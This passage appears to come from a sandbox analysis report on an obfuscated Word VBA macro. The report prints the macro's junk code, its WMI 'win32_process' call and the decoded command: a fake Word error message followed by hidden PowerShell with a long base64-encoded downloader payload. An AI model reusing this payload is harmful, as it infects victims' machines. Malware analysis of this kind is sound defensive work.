AC]b2[ssA]b2[sJw]b2[sBW]b2[sAC]b2[scA]b2[sKQ]b2[sA7]b2[sAC]b2[sAA]b2[sIA]b2[sAo]b2[sAC]b2[sAA]b2[sZw]b2[sBl]b2[sAF]b2[sQA]b2[sLQ]b2[sBW]b2[sAG]b2[sEA]b2[sUg]b2[sBp]b2[sAG]b2[sEA]b2[sYg]b2[sBs]b2[sAG]b2[sUA]b2[sIA]b2[sB1]b2[sAD]b2[sYA]b2[sMw]b2[sA1]b2[sAD]b2[sEA]b2[sIA]b2[sAt]b2[sAF]b2[sYA]b2) -> 19213

                                              executed
                                              110

                                              Goto qKxQJQE

                                              111

                                              Dim LITXEDEBE() as Byte

                                              112

                                              Dim JvVTCss as Integer

                                              113

                                              JvVTCss = FreeFile

                                              FreeFile

                                              114

                                              Open "F:\LFwuAJBD\MeKNHEh\XqeRErUC.bMHKAFLIh" For Binary Access Read As # JvVTCss

                                              Open

                                              115

                                              Open "O:\GVNBCFD\RBPGB\hCZaAY.voqXFB" For Binary Access Read As # JvVTCss

                                              Open

                                              116

                                              Redim LITXEDEBE(1 To LOF(intGend) - 5)

                                              LOF

                                              intGend

                                              117

                                              Get # JvVTCss, , LITXEDEBE

                                              118

                                              Get # JvVTCss, , LITXEDEBE

                                              119

                                              Get # JvVTCss, , LITXEDEBE

                                              120

                                              Close # JvVTCss

                                              120

                                              qKxQJQE:

                                              122

                                              Goto ZWAfIID

                                              123

                                              Dim sYcQrq() as Byte

                                              124

                                              Dim aPIAJ as Integer

                                              125

                                              aPIAJ = FreeFile

                                              FreeFile

                                              126

                                              Open "F:\mWSwpXAkG\PTfrgAdE\ddNtJFJ.OGZBEnFW" For Binary Access Read As # aPIAJ

                                              Open

                                              127

                                              Open "O:\MRWMgFJ\zsKRHI\OiSxC.XZZmtH" For Binary Access Read As # aPIAJ

                                              Open

                                              128

                                              Redim sYcQrq(1 To LOF(intGend) - 5)

                                              LOF

                                              intGend

                                              129

                                              Get # aPIAJ, , sYcQrq

                                              130

                                              Get # aPIAJ, , sYcQrq

                                              131

                                              Get # aPIAJ, , sYcQrq

                                              132

                                              Close # aPIAJ

                                              132

                                              ZWAfIID:

                                              134

                                              Wvxrpert99ob1x.Create Tfizx5uxnfjbxnml(Ysqw359hi8dilh_), Il6ap8xlb73, C1lvz_08ro0vrbmv6

                                              SWbemObjectEx.Create("cmd cmd cmd cmd /c msg %username% /v Word experienced an error trying to open the file. & P^Ow^er^she^L^L -w hidden -ENCOD IAAgACQAVQA2ADMANQAxAD0AWwBUAFkAcABFAF0AKAAiAHsAMgB9AHsAMAB9AHsAMQB9AHsANAB9AHsAMwB9AHsANQB9ACIAIAAtAEYAIAAnAHkAUwBUAEUAbQAuAGkAJwAsACcATwAuAGQAaQAnACwAJwBzACcALAAnAEUAYwBUAE8AJwAsACcAUgAnACwAJwBSAFkAJwApACAAIAA7ACQATwBMAFYAIAA9ACAAWwB0AFkAcABlAF0AKAAiAHsAMAB9AHsANwB9AHsAMQB9AHsAOAB9AHsAMwB9AHsANgB9AHsANQB9AHsAMgB9AHsANAB9ACIAIAAtAEYAJwBzAFkAJwAsACcAVABFAG0ALgBOAEUAJwAsACcAbgB0AG0AQQBOACcALAAnAHYAJwAsACcAQQBHAGUAUgAnACwAJwBJACcALAAnAGkAQwBlAFAATwAnACwAJwBzACcALAAnAFQALgBzAGUAUgAnACkAIAAgADsAIAAgACQARQByAHIAbwByAEEAYwB0AGkAbwBuAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA9ACAAKAAnAFMAaQAnACsAKAAnAGwAZQAnACsAJwBuACcAKQArACcAdAAnACsAKAAnAGwAeQAnACsAJwBDACcAKQArACgAJwBvAG4AdABpACcAKwAnAG4AJwArACcAdQBlACcAKQApADsAJABZAHQAZABfAHAAcABiAD0AJABIADQAXwBMACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABRADAAMQBRADsAJABFADEANQBOAD0AKAAoACcATwAnACsAJwAxAF8AJwApACsAJwBWACcAKQA7ACAAIAAoACAAZwBlAFQALQBWAGEAUgBpAGEAYgBsAGUAIAB1ADYAMwA1ADEAIAAtAFYAYQBMAFUARQBvAE4ATAB5ACAAKQA6ADoAIgBjAFIARQBgAEEAVABlAGQASQByAGAAZQBDAGAAVABvAHIAeQAiACgAJABIAE8ATQBFACAAKwAgACgAKAAnAHsAMAB9AE4AJwArACgAJwBzAGcAaAAnACsAJwBvACcAKQArACcAaAB0AHsAMAB9ACcAKwAnAEcAJwArACcAYgAnACsAKAAnAGgANQByACcAKwAnADkAbwAnACkAKwAnAHsAMAB9ACcAKQAgAC0AZgAgACAAWwBjAEgAYQBSAF0AOQAyACkAKQA7ACQATgA5ADUAVwA9ACgAKAAnAFMAJwArACcAMgA4ACcAKQArACcAUwAnACkAOwAgACAAKAAgACAATABzACAAIAB2AEEAcgBJAEEAQgBsAGUAOgBvAGwAVgApAC4AVgBBAGwAVQBFADoAOgAiAFMARQBDAFUAcgBgAEkAVABZAGAAUAByAE8AVABPAGAAYwBvAEwAIgAgAD0AIAAoACcAVABsACcAKwAoACcAcwAxACcAKwAnADIAJwApACkAOwAkAEsAXwAyAEwAPQAoACcAQgA2ACcAKwAnADcATwAnACkAOwAkAEIAZQB4AG8AMgA4AHQAIAA9ACAAKAAnAFEAMgAnACsAJwA3AFYAJwApADsAJABNADYAOQBOAD0AKAAoACcAVQAnACsAJwA3ADIAJwApACsAJwBBACcAKQA7ACQAWgBjADcAbgA3AHkAXwA9ACQASABPAE0ARQArACgAKAAnAHsAJwArACcAMAAnACsAJwB9ACcAKwAoACcATgAnACsAJwBzAGcAJwApACsAJwBoAG8AaAB0AHsAMAB9ACcAKwAnAEcAJwArACgAJwBiACcAKwAnAGgANQByACcAKQArACcAOQBvAHsAMAB9ACcAKQAgAC0ARgBbAEMASABBAFIAXQA5ADIAKQArACQAQgBlAHgAbwAyADgAdAArACgAJwAuAGQAJwArACcAbABsACcAKQA7ACQATgBfADEAVwA9ACgAKAAnAE0AJwArACcAMwA0ACcAKQArACcAWQAnACkAOwAkAEkAbABlAF8AdgBhAGEAPQAoACcAXQAnACsAKAAnAGIAMgAnACsAJwBbACcAKwAnAHMAOgAvAC8AdwAnACsAJwBoAGUAZQBsACcAKQArACcAYwBvACcAKwAnAG0AbwAnACsAJwB2AGkAJwArACgAJwBuACcAKwAnAGcALgBjAG8AJwArACcAbQAvAHAAJwApACsAJwAvAFIAJwArACcAdQAnACsAJwBNACcAKwAoACcAZQBSAFAAJwArACcAYQAnACkAKwAnAC8AQAAnACsAKAAnAF0AJwArACcAYgAyAFsAcwA6AC8AJwApACsAKAAnAC8AJwArACcAMAAwACcAKQArACcAegAnACsAKAAnAHkAJwArACcAawB1ACcAKQArACcALgAnACsAJwBjAG8AJwArACgAJwBtAC8AdwAnACsAJwBwACcAKwAnAC0AYQBkAG0AaQBuAC8AJwArACcAZQAnACkAKwAoACcAWQB1ADEAJwArACcAUQAvACcAKQArACcAQABdACcAKwAnAGIAJwArACgAJwAyAFsAJwArACcAcwA6AC8ALwBrACcAKQArACgAJwBlACcAKwAnAHQAbwByAGUAJwApACsAKAAnAHMAZQAnACsAJwB0AG0AJwApACsAKAAnAGUAJwArACcALgBjAG8AbQAnACkAKwAnAC8AdwAnACsAJwBwACcAKwAoACcALQAnACsAJwBjAG8AbgB0ACcAKQArACgAJwBlACcAKwAnAG4AdAAvAHAAbQBKACcAKQArACcALwAnACsAKAAnAEAAJwArACcAXQBiACcAKQArACcAMgAnACsAKAAnAFsAJwArACcAcwBzADoALwAnACsAJwAvACcAKQArACgAJwByAHkAYwBvACcAKwAnAG0AJwApACsAJwBwACcAKwAoACcAdQB0ACcAKwAnAGUAJwApACsAJwByAC4AJwArACgAJwBjAG8AbQAvAGMAJwArACcAbwBuACcAKQArACgAJwB0AGUAbgAnACsAJwB0AC8AVAAnACkAKwAoACcATAAvAEAAXQAnACsAJwBiACcAKwAnADIAWwBzACcAKwAnAHMAJwApACsAKAAnADoAJwArACcALwAvACcAKQArACcAZAAtACcAKwAoACcAYwAnACsAJwBlAG0AJwArACcALgBjAG8AbQAnACkAKwAnAC8AJwArACcAdwBwACcAKwAoACcALQBhACcAKwAnAGQAJwApACsAKAAnAG0AJwArACcAaQBuACcAKQArACcALwAnACsAKAAnAEoAJwArACcAUwBMAHcARwAxACcAKQArACgAJwAvAEAAXQBiADIAWwBzACcAKwAnADoAJwArACcALwAnACkAKwAnAC8AJwArACgAJwB0AGgAZQBiAGUAcwAnACsAJwB0ACcAKQArACcAZgAnACsAKAAnAGkAawByAGEAJwArACcAaAAuACcAKwAnAGMAbwAnACkAKwAnAG0AJwArACgAJwAvAHcAcAAtACcAKwAnAGEAZABtACcAKwAnAGkAJwArACcAbgAvACcAKQArACgAJwBmACcAKwAnAE8ASQBsACcAKwAnAFYAWAAvAEAAJwApACsAKAAnAF0AYgAyACcAKwAnAFsAJwApACsAKAAnAHMAcwA6AC8AJwArACcALwAnACkAKwAoACcAcABoACcAKwAnAGEAdwAnACkAKwAoACcAYQB5AGEAJwArACcAZwBlACcAKQArACcAbgAnACsAKAAnAGMAeQAnACsAJwAuAGMAbwBtAC8AJwApACsAJwB3ACcAKwAnAHAAJwArACgAJwAtACcAKwAnAGEAZAAnACkAKwAnAG0AaQAnACsAJwBuACcAKwAoACcALwAnACsAJwBtAFgAbwAnACkAKwAnADQAYgAnACsAJwAvACcAKQAuACIAcgBlAHAAYABMAGAAQQB,,) -> 0

                                              Il6ap8xlb73

                                              C1lvz_08ro0vrbmv6

                                              executed
                                              135

                                              Goto cgFzqJS

                                              136

                                              Dim ktJgD() as Byte

                                              137

                                              Dim rxYZps as Integer

                                              138

                                              rxYZps = FreeFile

                                              FreeFile

                                              139

                                              Open "F:\CmMyA\WnqICJj\RxyolAqJ.nRDeH" For Binary Access Read As # rxYZps

                                              Open

                                              140

                                              Open "O:\bIYmeeW\uNvuErAyD\EIuXFu.FZTwFCBPD" For Binary Access Read As # rxYZps

                                              Open

                                              141

                                              Redim ktJgD(1 To LOF(intGend) - 5)

                                              LOF

                                              intGend

                                              142

                                              Get # rxYZps, , ktJgD

                                              143

                                              Get # rxYZps, , ktJgD

                                              144

                                              Get # rxYZps, , ktJgD

                                              145

                                              Close # rxYZps

                                              145

                                              cgFzqJS:

                                              147

                                              Goto fMGbFJDRE

                                              148

                                              Dim Gyyqq() as Byte

                                              149

                                              Dim UfOeJ as Integer

                                              150

                                              UfOeJ = FreeFile

                                              FreeFile

                                              151

                                              Open "F:\ttHCHFDz\vMPdJC\ZVyvz.VjTkH" For Binary Access Read As # UfOeJ

                                              Open

                                              152

                                              Open "O:\BccaMZ\jTkNfIWH\wtXBIkAZ.sSCvDComF" For Binary Access Read As # UfOeJ

                                              Open

                                              153

                                              Redim Gyyqq(1 To LOF(intGend) - 5)

                                              LOF

                                              intGend

                                              154

                                              Get # UfOeJ, , Gyyqq

                                              155

                                              Get # UfOeJ, , Gyyqq

                                              156

                                              Get # UfOeJ, , Gyyqq

                                              157

                                              Close # UfOeJ

                                              157

                                              fMGbFJDRE:

                                              159

                                              End Function

                                              APIsMeta Information

                                              FreeFile

                                              Open

                                              Open

                                              LOF

                                              intGend

                                              FreeFile

                                              Open

                                              Open

                                              LOF

                                              intGend

                                              Part of subcall function Xrl25i0p5sd_oj40b@Jwq9b1lb0hmm7: Ubnvz_721a0k0z7gn

                                              Part of subcall function Xrl25i0p5sd_oj40b@Jwq9b1lb0hmm7: FreeFile

                                              Part of subcall function Xrl25i0p5sd_oj40b@Jwq9b1lb0hmm7: Open

                                              Part of subcall function Xrl25i0p5sd_oj40b@Jwq9b1lb0hmm7: Open

                                              Part of subcall function Xrl25i0p5sd_oj40b@Jwq9b1lb0hmm7: LOF

                                              Part of subcall function Xrl25i0p5sd_oj40b@Jwq9b1lb0hmm7: intGend

                                              Part of subcall function Xrl25i0p5sd_oj40b@Jwq9b1lb0hmm7: Replace

                                              Part of subcall function Xrl25i0p5sd_oj40b@Jwq9b1lb0hmm7: Zxrltp30ofw

                                              Part of subcall function Xrl25i0p5sd_oj40b@Jwq9b1lb0hmm7: FreeFile

                                              Part of subcall function Xrl25i0p5sd_oj40b@Jwq9b1lb0hmm7: Open

                                              Part of subcall function Xrl25i0p5sd_oj40b@Jwq9b1lb0hmm7: Open

                                              Part of subcall function Xrl25i0p5sd_oj40b@Jwq9b1lb0hmm7: LOF

                                              Part of subcall function Xrl25i0p5sd_oj40b@Jwq9b1lb0hmm7: intGend

                                              FreeFile

                                              Open

                                              Open

                                              LOF

                                              intGend

                                              FreeFile

                                              Open

                                              Open

                                              LOF

                                              intGend

                                              StringsDecrypted Strings
                                              "F:\SHBduI\KjeOHB\KwnyCEHCA.QsWbrdJu"
                                              "O:\GyBLIwJ\JyRgQhPrC\cnPdi.CmtbG"
                                              "F:\UeqgCwFC\RxvLiOJ\RLltYG.ddhvuGkBf"
                                              "O:\afdxHDJBG\OOakBB\YSVJm.JNPGbSG"
                                              "F:\IdwCD\hmrPgFD\cRBUGEn.vHNcDFc"
                                              "O:\xaLnPmJ\onZFlHPHD\pjbxIFFyV.svJWEETFm"
                                              "F:\TtMDAecA\xaSGJIyyl\NmQTHB.LFYtzzGH"
                                              "O:\jobmCCM\LsFeNKGF\DLsTwJcGF.EAyuxB"
                                              LineInstructionMeta Information
                                              160

                                              Function Tfizx5uxnfjbxnml(Vxdy838fy4c1xspht)

                                              161

                                              On Error Resume Next

                                              executed
                                              162

                                              Goto wcDKJI

                                              163

                                              Dim tKzwqzI() as Byte

                                              164

                                              Dim BrygCBI as Integer

                                              165

                                              BrygCBI = FreeFile

                                              FreeFile

                                              166

                                              Open "F:\SHBduI\KjeOHB\KwnyCEHCA.QsWbrdJu" For Binary Access Read As # BrygCBI

                                              Open

                                              167

                                              Open "O:\GyBLIwJ\JyRgQhPrC\cnPdi.CmtbG" For Binary Access Read As # BrygCBI

                                              Open

                                              168

                                              Redim tKzwqzI(1 To LOF(intGend) - 5)

                                              LOF

                                              intGend

                                              169

                                              Get # BrygCBI, , tKzwqzI

                                              170

                                              Get # BrygCBI, , tKzwqzI

                                              171

                                              Get # BrygCBI, , tKzwqzI

                                              172

                                              Close # BrygCBI

                                              172

                                              wcDKJI:

                                              174

                                              Tt79y87d36ripg03s = (Vxdy838fy4c1xspht)

                                              175

                                              Goto lOETktD

                                              176

                                              Dim gJLEFBFsL() as Byte

                                              177

                                              Dim BIeAA as Integer

                                              178

                                              BIeAA = FreeFile

                                              FreeFile

                                              179

                                              Open "F:\UeqgCwFC\RxvLiOJ\RLltYG.ddhvuGkBf" For Binary Access Read As # BIeAA

                                              Open

                                              180

                                              Open "O:\afdxHDJBG\OOakBB\YSVJm.JNPGbSG" For Binary Access Read As # BIeAA

                                              Open

                                              181

                                              Redim gJLEFBFsL(1 To LOF(intGend) - 5)

                                              LOF

                                              intGend

                                              182

                                              Get # BIeAA, , gJLEFBFsL

                                              183

                                              Get # BIeAA, , gJLEFBFsL

                                              184

                                              Get # BIeAA, , gJLEFBFsL

                                              185

                                              Close # BIeAA

                                              185

                                              lOETktD:

                                              187

                                              Haq5kvro2d9z = Xrl25i0p5sd_oj40b(Tt79y87d36ripg03s)

                                              188

                                              Goto RimyuHaBD

                                              189

                                              Dim nOveD() as Byte

                                              190

                                              Dim fFPBDj as Integer

                                              191

                                              fFPBDj = FreeFile

                                              FreeFile

                                              192

                                              Open "F:\IdwCD\hmrPgFD\cRBUGEn.vHNcDFc" For Binary Access Read As # fFPBDj

                                              Open

                                              193

                                              Open "O:\xaLnPmJ\onZFlHPHD\pjbxIFFyV.svJWEETFm" For Binary Access Read As # fFPBDj

                                              Open

                                              194

                                              Redim nOveD(1 To LOF(intGend) - 5)

                                              LOF

                                              intGend

                                              195

                                              Get # fFPBDj, , nOveD

                                              196

                                              Get # fFPBDj, , nOveD

                                              197

                                              Get # fFPBDj, , nOveD

                                              198

                                              Close # fFPBDj

                                              198

                                              RimyuHaBD:

                                              200

                                              Tfizx5uxnfjbxnml = Haq5kvro2d9z

                                              201

                                              Goto VSbuEj

                                              202

                                              Dim RzwvkExUI() as Byte

                                              203

                                              Dim tSFvVJKHm as Integer

                                              204

                                              tSFvVJKHm = FreeFile

                                              FreeFile

                                              205

                                              Open "F:\TtMDAecA\xaSGJIyyl\NmQTHB.LFYtzzGH" For Binary Access Read As # tSFvVJKHm

                                              Open

                                              206

                                              Open "O:\jobmCCM\LsFeNKGF\DLsTwJcGF.EAyuxB" For Binary Access Read As # tSFvVJKHm

                                              Open

                                              207

                                              Redim RzwvkExUI(1 To LOF(intGend) - 5)

                                              LOF

                                              intGend

                                              208

                                              Get # tSFvVJKHm, , RzwvkExUI

                                              209

                                              Get # tSFvVJKHm, , RzwvkExUI

                                              210

                                              Get # tSFvVJKHm, , RzwvkExUI

                                              211

                                              Close # tSFvVJKHm

                                              211

                                              VSbuEj:

                                              213

                                              End Function

                                              APIsMeta Information

                                              Ubnvz_721a0k0z7gn

                                              FreeFile

                                              Open

                                              Open

                                              LOF

                                              intGend

                                              Replace

                                              Replace("w]b2[sin]b2[sm]b2[sgm]b2[st]b2[s]b2[s]b2[ss]b2[s]b2[s:w]b2[s]b2[sin]b2[s3]b2[s2]b2[s_]b2[s]b2[sp]b2[s]b2[sro]b2[s]b2[sce]b2[ss]b2[ss]b2[s]b2[s","]b2[s",) -> winmgmts:win32_process Replace("]b2[s]b2[sc]b2[sm]b2[sd]b2[s ]b2[sc]b2[sm]b2[sd]b2[s ]b2[sc]b2[sm]b2[sd]b2[s ]b2[sc]b2[sm]b2[sd]b2[s ]b2[s/]b2[sc]b2[s ]b2[sm]b2[ss]b2[sg]b2[s ]b2[s%]b2[su]b2[ss]b2[se]b2[sr]b2[sn]b2[sa]b2[sm]b2[se]b2[s%]b2[s ]b2[s/]b2[sv]b2[s ]b2[sW]b2[so]b2[sr]b2[sd]b2[s ]b2[se]b2[sx]b2[sp]b2[se]b2[sr]b2[si]b2[se]b2[sn]b2[sc]b2[se]b2[sd]b2[s ]b2[sa]b2[sn]b2[s ]b2[se]b2[sr]b2[sr]b2[so]b2[sr]b2[s ]b2[st]b2[sr]b2[sy]b2[si]b2[sn]b2[sg]b2[s ]b2[st]b2[so]b2[s ]b2[so]b2[sp]b2[se]b2[sn]b2[s ]b2[st]b2[sh]b2[se]b2[s ]b2[sf]b2[si]b2[sl]b2[se]b2[s.]b2[s ]b2[s&]b2[s ]b2[s ]b2[sP]b2[s^]b2[sO]b2[sw]b2[s^]b2[se]b2[sr]b2[s^]b2[ss]b2[sh]b2[se]b2[s^]b2[sL]b2[s^]b2[sL]b2[s ]b2[s-]b2[sw]b2[s ]b2[sh]b2[si]b2[sd]b2[sd]b2[se]b2[sn]b2[s ]b2[s-]b2[sE]b2[sN]b2[sC]b2[sO]b2[sD]b2[s ]b2[s ]b2[s ]b2[s ]b2[s ]b2[s ]b2[s ]b2[s ]b2[s ]b2[s ]b2[s ]b2[s ]b2[s ]b2[s ]b2[s ]b2[s ]b2[s IA]b2[sAg]b2[sAC]b2[sQA]b2[sVQ]b2[sA2]b2[sAD]b2[sMA]b2[sNQ]b2[sAx]b2[sAD]b2[s0A]b2[sWw]b2[sBU]b2[sAF]b2[skA]b2[scA]b2[sBF]b2[sAF]b2[s0A]b2[sKA]b2[sAi]b2[sAH]b2[ssA]b2[sMg]b2[sB9]b2[sAH]b2[ssA]b2[sMA]b2[sB9]b2[sAH]b2[ssA]b2[sMQ]b2[sB9]b2[sAH]b2[ssA]b2[sNA]b2[sB9]b2[sAH]b2[ssA]b2[sMw]b2[sB9]b2[sAH]b2[ssA]b2[sNQ]b2[sB9]b2[sAC]b2[sIA]b2[sIA]b2[sAt]b2[sAE]b2[sYA]b2[sIA]b2[sAn]b2[sAH]b2[skA]b2[sUw]b2[sBU]b2[sAE]b2[sUA]b2[sbQ]b2[sAu]b2[sAG]b2[skA]b2[sJw]b2[sAs]b2[sAC]b2[scA]b2[sTw]b2[sAu]b2[sAG]b2[sQA]b2[saQ]b2[sAn]b2[sAC]b2[swA]b2[sJw]b2[sBz]b2[sAC]b2[scA]b2[sLA]b2[sAn]b2[sAE]b2[sUA]b2[sYw]b2[sBU]b2[sAE]b2[s8A]b2[sJw]b2[sAs]b2[sAC]b2[scA]b2[sUg]b2[sAn]b2[sAC]b2[swA]b2[sJw]b2[sBS]b2[sAF]b2[skA]b2[sJw]b2[sAp]b2[sAC]b2[sAA]b2[sIA]b2[sA7]b2[sAC]b2[sQA]b2[sTw]b2[sBM]b2[sAF]b2[sYA]b2[sIA]b2[sA9]b2[sAC]b2[sAA]b2[sWw]b2[sB0]b2[sAF]b2[skA]b2[scA]b2[sBl]b2[sAF]b2[s0A]b2[sKA]b2[sAi]b2[sAH]b2[ssA]b2[sMA]b2[sB9]b2[sAH]b2[ssA]b2[sNw]b2[sB9]b2[sAH]b2[ssA]b2[sMQ]b2[sB9]b2[sAH]b2[ssA]b2[sOA]b2[sB9]b2[sAH]b2[ssA]b2[sMw]b2[sB9]b2[sAH]b2[ssA]b2[sNg]b2[sB9]b2[sAH]b2[ssA]b2[sNQ]b2[sB9]b2[sAH]b2[ssA]b2[sMg]b2[sB9]b2[sAH]b2[ssA]b2[sNA]b2[sB9]b2[sAC]b2[sIA]b2[sIA]b2[sAt]b2[sAE]b2[sYA]b2[sJw]b2[sBz]b2[sAF]b2[skA]b2[sJw]b2[sAs]b2[sAC]b2[scA]b2[sVA]b2[sBF]b2[sAG]b2[s0A]b2[sLg]b2[sBO]b2[sAE]b2[sUA]b2[sJw]b2[sAs]b2[sAC]b2[scA]b2[sbg]b2[sB0]b2[sAG]b2[s0A]b2[sQQ]b2[sBO]b2[sAC]b2[scA]b2[sLA]b2[sAn]b2[sAH]b2[sYA]b2[sJw]b2[sAs]b2[sAC]b2[scA]b2[sQQ]b2[sBH]b2[sAG]b2[sUA]b2[sUg]b2[sAn]b2[sAC]b2[swA]b2[sJw]b2[sBJ]b2[sAC]b2[scA]b2[sLA]b2[sAn]b2[sAG]b2[skA]b2[sQw]b2[sBl]b2[sAF]b2[sAA]b2[sTw]b2[sAn]b2[sAC]b2[swA]b2[sJw]b2[sBz]b2[sAC]b2[scA]b2[sLA]b2[sAn]b2[sAF]b2[sQA]b2[sLg]b2[sBz]b2[sAG]b2[sUA]b2[sUg]b2[sAn]b2[sAC]b2[skA]b2[sIA]b2[sAg]b2[sAD]b2[ssA]b2[sIA]b2[sAg]b2[sAC]b2[sQA]b2[sRQ]b2[sBy]b2[sAH]b2[sIA]b2[sbw]b2[sBy]b2[sAE]b2[sEA]b2[sYw]b2[sB0]b2[sAG]b2[skA]b2[sbw]b2[sBu]b2[sAF]b2[sAA]b2[scg]b2[sBl]b2[sAG]b2[sYA]b2[sZQ]b2[sBy]b2[sAG]b2[sUA]b2[sbg]b2[sBj]b2[sAG]b2[sUA]b2[sIA]b2[sA9]b2[sAC]b2[sAA]b2[sKA]b2[sAn]b2[sAF]b2[sMA]b2[saQ]b2[sAn]b2[sAC]b2[ssA]b2[sKA]b2[sAn]b2[sAG]b2[swA]b2[sZQ]b2[sAn]b2[sAC]b2[ssA]b2[sJw]b2[sBu]b2[sAC]b2[scA]b2[sKQ]b2[sAr]b2[sAC]b2[scA]b2[sdA]b2[sAn]b2[sAC]b2[ssA]b2[sKA]b2[sAn]b2[sAG]b2[swA]b2[seQ]b2[sAn]b2[sAC]b2[ssA]b2[sJw]b2[sBD]b2[sAC]b2[scA]b2[sKQ]b2[sAr]b2[sAC]b2[sgA]b2[sJw]b2[sBv]b2[sAG]b2[s4A]b2[sdA]b2[sBp]b2[sAC]b2[scA]b2[sKw]b2[sAn]b2[sAG]b2[s4A]b2[sJw]b2[sAr]b2[sAC]b2[scA]b2[sdQ]b2[sBl]b2[sAC]b2[scA]b2[sKQ]b2[sAp]b2[sAD]b2[ssA]b2[sJA]b2[sBZ]b2[sAH]b2[sQA]b2[sZA]b2[sBf]b2[sAH]b2[sAA]b2[scA]b2[sBi]b2[sAD]b2[s0A]b2[sJA]b2[sBI]b2[sAD]b2[sQA]b2[sXw]b2[sBM]b2[sAC]b2[sAA]b2[sKw]b2[sAg]b2[sAF]b2[ssA]b2[sYw]b2[sBo]b2[sAG]b2[sEA]b2[scg]b2[sBd]b2[sAC]b2[sgA]b2[sNg]b2[sA0]b2[sAC]b2[skA]b2[sIA]b2[sAr]b2[sAC]b2[sAA]b2[sJA]b2[sBR]b2[sAD]b2[sAA]b2[sMQ]b2[sBR]b2[sAD]b2[ssA]b2[sJA]b2[sBF]b2[sAD]b2[sEA]b2[sNQ]b2[sBO]b2[sAD]b2[s0A]b2[sKA]b2[sAo]b2[sAC]b2[scA]b2[sTw]b2[sAn]b2[sAC]b2[ssA]b2[sJw]b2[sAx]b2[sAF]b2[s8A]b2[sJw]b2[sAp]b2[sAC]b2[ssA]b2[sJw]b2[sBW]b2[sAC]b2[scA]b2[sKQ]b2[sA7]b2[sAC]b2[sAA]b2[sIA]b2[sAo]b2[sAC]b2[sAA]b2[sZw]b2[sBl]b2[sAF]b2[sQA]b2[sLQ]b2[sBW]b2[sAG]b2[sEA]b2[sUg]b2[sBp]b2[sAG]b2[sEA]b2[sYg]b2[sBs]b2[sAG]b2[sUA]b2[sIA]b2[sB1]b2[sAD]b2[sYA]b2[sMw]b2[sA1]b2[sAD]b2[sEA]b2[sIA]b2[sAt]b2[sAF]b2[sYA]b2[sYQ,"]b2[s",) -> cmd cmd cmd cmd /c msg %username% /v Word experienced an error trying to open the file. & P^Ow^er^she^L^L -w hidden -ENCOD IAAgACQAVQA2ADMANQAxAD0AWwBUAFkAcABFAF0AKAAiAHsAMgB9AHsAMAB9AHsAMQB9AHsANAB9AHsAMwB9AHsANQB9ACIAIAAtAEYAIAAnAHkAUwBUAEUAbQAuAGkAJwAsACcATwAuAGQAaQAnACwAJwBzACcALAAnAEUAYwBUAE8AJwAsACcAUgAnACwAJwBSAFkAJwApACAAIAA7ACQATwBMAFYAIAA9ACAAWwB0AFkAcABlAF0AKAAiAHsAMAB9AHsANwB9AHsAMQB9AHsAOAB9AHsAMwB9AHsANgB9AHsANQB9AHsAMgB9AHsANAB9ACIAIAAtAEYAJwBzAFkAJwAsACcAVABFAG0ALgBOAEUAJwAsACcAbgB0AG0AQQBOACcALAAnAHYAJwAsACcAQQBHAGUAUgAnACwAJwBJACcALAAnAGkAQwBlAFAATwAnACwAJwBzACcALAAnAFQALgBzAGUAUgAnACkAIAAgADsAIAAgACQARQByAHIAbwByAEEAYwB0AGkAbwBuAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA9ACAAKAAnAFMAaQAnACsAKAAnAGwAZQAnACsAJwBuACcAKQArACcAdAAnACsAKAAnAGwAeQAnACsAJwBDACcAKQArACgAJwBvAG4AdABpACcAKwAnAG4AJwArACcAdQBlACcAKQApADsAJABZAHQAZABfAHAAcABiAD0AJABIADQAXwBMACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABRADAAMQBRADsAJABFADEANQBOAD0AKAAoACcATwAnACsAJwAxAF8AJwApACsAJwBWACcAKQA7ACAAIAAoACAAZwBlAFQALQBWAGEAUgBpAGEAYgBsAGUAIAB1ADYAMwA1ADEAIAAtAFYAYQBMAFUARQBvAE4ATAB5ACAAKQA6ADoAIgBjAFIARQBgAEEAVABlAGQASQByAGAAZQBDAGAAVABvAHIAeQAiACgAJABIAE8ATQBFACAAKwAgACgAKAAnAHsAMAB9AE4AJwArACgAJwBzAGcAaAAnACsAJwBvACcAKQArACcAaAB0AHsAMAB9ACcAKwAnAEcAJwArACcAYgAnACsAKAAnAGgANQByACcAKwAnADkAbwAnACkAKwAnAHsAMAB9ACcAKQAgAC0AZgAgACAAWwBjAEgAYQBSAF0AOQAyACkAKQA7ACQATgA5ADUAVwA9ACgAKAAnAFMAJwArACcAMgA4ACcAKQArACcAUwAnACkAOwAgACAAKAAgACAATABzACAAIAB2AEEAcgBJAEEAQgBsAGUAOgBvAGwAVgApAC4AVgBBAGwAVQBFADoAOgAiAFMARQBDAFUAcgBgAEkAVABZAGAAUAByAE8AVABPAGAAYwBvAEwAIgAgAD0AIAAoACcAVABsACcAKwAoACcAcwAxACcAKwAnADIAJwApACkAOwAkAEsAXwAyAEwAPQAoACcAQgA2ACcAKwAnADcATwAnACkAOwAkAEIAZQB4AG8AMgA4AHQAIAA9ACAAKAAnAFEAMgAnACsAJwA3AFYAJwApADsAJABNADYAOQBOAD0AKAAoACcAVQAnACsAJwA3ADIAJwApACsAJwBBACcAKQA7ACQAWgBjADcAbgA3AHkAXwA9ACQASABPAE0ARQArACgAKAAnAHsAJwArACcAMAAnACsAJwB9ACcAKwAoACcATgAnACsAJwBzAGcAJwApACsAJwBoAG8AaAB0AHsAMAB9ACcAKwAnAEcAJwArACgAJwBiACcAKwAnAGgANQByACcAKQArACcAOQBvAHsAMAB9ACcAKQAgAC0ARgBbAEMASABBAFIAXQA5ADIAKQArACQAQgBlAHgAbwAyADgAdAArACgAJwAuAGQAJwArACcAbABsACcAKQA7ACQATgBfADEAVwA9ACgAKAAnAE0AJwArACcAMwA0ACcAKQArACcAWQAnACkAOwAkAEkAbABlAF8AdgBhAGEAPQAoACcAXQAnACsAKAAnAGIAMgAnACsAJwBbACcAKwAnAHMAOgAvAC8AdwAnACsAJwBoAGUAZQBsACcAKQArACcAYwBvACcAKwAnAG0AbwAnACsAJwB2AGkAJwArACgAJwBuACcAKwAnAGcALgBjAG8AJwArACcAbQAvAHAAJwApACsAJwAvAFIAJwArACcAdQAnACsAJwBNACcAKwAoACcAZQBSAFAAJwArACcAYQAnACkAKwAnAC8AQAAnACsAKAAnAF0A